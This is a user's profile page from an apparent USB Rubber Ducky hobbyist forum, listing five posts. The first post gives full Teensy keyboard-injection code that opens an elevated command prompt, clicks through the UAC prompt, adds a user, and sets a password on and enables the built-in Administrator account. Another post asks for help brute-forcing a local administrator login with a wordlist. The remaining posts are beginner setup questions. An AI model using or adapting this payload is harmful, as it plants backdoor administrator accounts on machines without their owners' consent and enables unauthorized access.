Jump to content

Jonny_Walked

Active Members
  • Posts

    5
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Jonny_Walked's Achievements

Newbie

Newbie (1/14)

  1. ok guys here is my first code its very basic and based on code by Benownzu93 so thank you what it does: 1) adds a new user 2) activates the true Administrator account and changes the password 3) then exits cmd 4) blinks when payload is finished works with windows 7 but i cant get it to work properly on vista the timing is all off but the delays i have set are long enough for all the commands to run successfully thanks and i would love some feedback or ideas for things to add void setup() { delay(4000); cmd(); delay(1000); uac(); delay(1000); Keyboard.print("net user MrDucky quackquack /add"); enter(); delay(500); Keyboard.print("net user administrator * "); enter(); delay(500); Keyboard.print("Password"); enter(); delay(200); Keyboard.print("Password"); enter(); delay(500); Keyboard.print("net user administrator /active:yes"); enter(); delay(500); Keyboard.print("exit"); enter(); } void loop() { digitalWrite(PIN_D6, LOW); // LED on delay(random(1000)); // Slow blink digitalWrite(PIN_D6, HIGH); // LED off delay(random(1000)); } void cmd(){ Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); Keyboard.print("cmd"); delay(700); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(100); } void uac(){ Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_Y); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void enter(){ Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }
  2. ok so i downloaded and the stuff i need to start coding but i cant seem to be able to code with c or c++ in the Arduino IDE i dont understand what im doing wrong. what code should i be using with the IDE? if i need one were can i fing a c/c++ library for the IDE? is there a tutorial some were that will tell me what im doing wrong? i did get some code off of the forum to work but i dont know what going one thanks
  3. Hey guys, I'm just wondering if I was able to make a code with Arduino to generate passwords, then use them to attempt to bruteforce an admin account locally. As in: Generate password, input "administrator" - (username) tab, input password value, enter enter. repeat until access is granted. I am also considering using a wordlist, any links or even code on how to implement this would be great. Thanks in advance.
  4. thanks for the help guys i am very grateful
  5. hey guys i just saw the rubber ducky segment and i am really keen to get started but i have a problem i own a mac but i want to make my ducky to work on windows or if possible both. what i need to know is can i use mac OS X to build a ducky for a windows box and if so what code do i use and what do i need to get to make it all work. if not how can i go about this.
×
×
  • Create New...